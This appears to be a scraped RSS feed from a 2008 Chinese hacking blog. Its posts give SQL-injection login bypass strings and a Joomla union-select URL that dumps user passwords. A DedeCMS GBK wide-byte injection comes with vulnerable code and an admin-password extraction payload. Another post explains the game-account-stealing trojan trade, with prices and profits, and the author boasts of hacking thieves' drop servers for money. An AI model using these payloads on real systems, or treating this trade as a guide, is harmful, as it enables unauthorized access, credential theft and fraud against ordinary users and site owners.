http://www.spookzang.net/index.php zh-cn http://www.spookzang.net/read.php/340.htm spookzang <spookzang@gmail.com> Sat, 22 Nov 2008 02:00:08 +0000 http://www.spookzang.net/read.php/340.htm http://www.[SpookZanG].Netl/chat/nattechat/home.asp

用户名输入admin，

密码输入 ' or '1'='1

即可进入.
Tags - 后台 , 登录 ]]> http://www.spookzang.net/read.php/339.htm spookzang <spookzang@gmail.com> Sat, 22 Nov 2008 01:58:11 +0000 http://www.spookzang.net/read.php/339.htm
http://www.[spookzang].net/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*

Tags - sql , 注入 ]]> http://www.spookzang.net/read.php/338.htm spookzang <spookzang@gmail.com> Tue, 18 Nov 2008 03:11:34 +0000 http://www.spookzang.net/read.php/338.htm http://www.spookzang.net/read.php/337.htm spookzang <spookzang@gmail.com> Sat, 15 Nov 2008 15:05:33 +0000 http://www.spookzang.net/read.php/337.htm
用户名和密码输入：' or ' 1=1--

即可。
Tags - 登录 , 漏洞 ]]> http://www.spookzang.net/read.php/336.htm spookzang <spookzang@gmail.com> Sat, 15 Nov 2008 15:00:49 +0000 http://www.spookzang.net/read.php/336.htm
漏洞文件：plus/infosearch.php

测试版本：5.1 gbk

描述：$q变量没有过滤直接进入查询，导致注入出现。代码如下：

PHP代码

q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}

$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";

$dlist = new DataList();

$dlist->pageSize = 20;
$dlist->SetParameter("q",$q);
$dlist->SetParameter("action",'search');
$dlist->SetParameter("areaid",$areaid);
$dlist->SetSource($query);
“‘”突破了，那就照常注入。

测试站：
http://www.xxx.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*

至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题，象feedback.php,后续发放分析。




Tags - gbk , php , 特殊 , 字符 ]]> http://www.spookzang.net/read.php/335.htm spookzang <spookzang@gmail.com> Sat, 15 Nov 2008 14:58:33 +0000 http://www.spookzang.net/read.php/335.htm Tags - 魔力2 , 回归 , 9you ]]> http://www.spookzang.net/read.php/334.htm spookzang <spookzang@gmail.com> Sat, 08 Nov 2008 14:18:42 +0000 http://www.spookzang.net/read.php/334.htm


Tags - sql , 注入 , 漏洞 ]]> http://www.spookzang.net/read.php/333.htm spookzang <spookzang@gmail.com> Sat, 08 Nov 2008 14:15:20 +0000 http://www.spookzang.net/read.php/333.htm 1.流量商--这类人等于说是这行业的营业员 促销员..没有他你就等于没有“顾客”....
他们从个个网站站长手里收来流量 其中也有黑来的网站.然后转到自己的服务器里 自己的服务器挂好网马.有漏洞的话 点击那些网站 就会自动运行一个程序 “下载者”.下载者的功能是 直接干掉你的杀软.有的有熊猫烧香的能力去感染..ARP..自动按规矩按时间去下载规定的木马.上次我做了个实验.中了一个 直接下载了34个木马病毒..个类网游的木马都有.. 这类人 我详细算了一下 他们收流量的价格是 1万IP=90元... 就算是100元.他们给那些买木马挂信的人来挂 就拿100万流量来跑...网马中率为百分之20（已经很低了）. 那么会有20万个人中镖..这20万人..算有百分之10的人玩网络游戏 那么大概会有2万个游戏ID.. 个个游戏的价位不一样的..平均了一下 按最低价 一个ID 算1元.那么他的收入是一天2万元..收100万流量的钱才1千快... 在除掉服务器的费用下家宣传收量的费用 除 除 除 算掉1万. 那么他一天赚1万！...我已经算的够低了...！ 往往是这个的好几倍！
2.木马作者--这类人 市场上形成品牌的有 按顺序来 “快乐老家” “八一软件” “大小姐”“刺客”“大少爷”“天下无马”“巴拿马”“伯乐” “站神”“比翼马”“皇马”“温柔马”等..
这些作者写了有20多款游戏的木马每款木马生成器卖3000元 小马1000元.（小马是一个地址一个木马.而生成器是可以生成出很多的小马.这些木马是网站ASP收信的 俗称 “箱子”）...现在都形成品牌了..因为流量商挂马要名牌作者的马 都有马的验证器...而那些验证器上 可以给垄断马（你垄断了以后作者不会在卖给别人）的人做广告 垄断一款马的价格是 一月2万...就拿伯乐来说 他不下15款游戏被垄断了.这一月就30万.还有他卖其他没垄断的马.
.... 具我了解“天下无马”这个作者 做了一年..赚了最少不下300多万.然后洗手不干了.
3.做游戏的--（什么游戏的都用 只要你能掌握一门游戏）买马 垄断马..大规模的找流量商去挂...挂完以后 现在大多数都是以工作室为主..自己挂来自己洗（扒号卖装备卖游戏币）完了以后卖RMB..
有的做卖信的..比如 1快从流量商那挂来的信2快卖出去..卖给那些洗信的人..这些人很多..因为都是利润..拿梦幻西游这个游戏来说吧...他们1.3元挂来的信3元卖给 洗信的人...这些信（盗来的帐号密码）只要是个很普通点的号 算个中等的 装备钱卖了 值500万梦幻游戏币绰绰有余 大号就先不说了..而500万游戏币 就是50元RMB...而且非常好卖...运气好了遇到一个大号 随便值2 3百不成问题....
一般的 我认识的一个做大话3的..以前一天最高进信 2万多..他只卖信赚差价 都是供不应求的..
4.受害者--游戏玩家 ...现在的网络游戏 纯粹是金钱游戏了.不投入RMB你是玩不好的...而这些人号是怎么丢的呢？？？ 无意期间 baidu个问题....进了一些不是知名的大网站 或者黄网............
这就是这个行业...创造了很多百万..也拯救了不少沉迷在网络游戏里的学生 青少年...
而我呢？ 哈哈 在这行业里也两年了..我不是以上环节的.我算的上是黑吃黑吧...
中马后然后上游戏 抓箱子的地址 然后根据某种漏洞去黑他们的箱子（他们的箱子是种WEB空间收信的ASP）..抓到地址后 黑他的箱子管理密码然后把这些箱子 便宜的去出售给会洗这些游戏的人.叫他们抢先去洗..下家也很赚 而我 对于我现在的经济能力也算很赚...最高记录一个月赚了1万6...但是由于上学时间有限因素..没有把他当回事..没有把他当很能赚钱创业的去对待.. 现在这个时常已经形成了品牌了做的那些人 越做越富...而现在黑箱子的那个漏洞 也不管用了..
哎 真后悔以前小..没当回事没去做款游戏..做了的话 我现在绝对一年收入不下百万..


Tags - 内幕 ]]> http://www.spookzang.net/read.php/332.htm spookzang <spookzang@gmail.com> Sat, 08 Nov 2008 14:13:59 +0000 http://www.spookzang.net/read.php/332.htm

在用户名和密码处输入：

  ' or ' 1=1

即可登入
Tags - sql , 注入 , 登入 , 漏洞 ]]> http://www.spookzang.net/read.php/331.htm spookzang <spookzang@gmail.com> Wed, 05 Nov 2008 08:21:55 +0000 http://www.spookzang.net/read.php/331.htm